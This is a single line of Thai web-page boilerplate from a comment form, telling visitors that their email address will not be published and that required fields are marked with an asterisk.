อีเมลของคุณจะไม่แสดงให้คนอื่นเห็น ช่องข้อมูลจำเป็นถูกทำเครื่องหมาย *